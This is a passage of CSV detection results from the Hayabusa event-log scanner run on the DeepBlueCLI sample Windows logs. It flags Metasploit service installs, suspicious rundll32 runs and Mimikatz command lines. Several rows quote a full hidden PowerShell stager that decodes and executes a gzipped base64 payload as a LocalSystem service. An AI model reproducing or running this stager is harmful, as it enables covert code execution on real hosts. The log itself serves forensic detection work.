0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:22:36.074 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:22:36.074 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:22:36.074 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:22:36.105 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:22:36.105 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:22:36.105 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:24:48.043 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:24:48.043 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:24:48.043 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:24:48.074 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:24:48.074 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:24:48.074 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.230 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:40:21.230 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:40:21.230 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.261 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76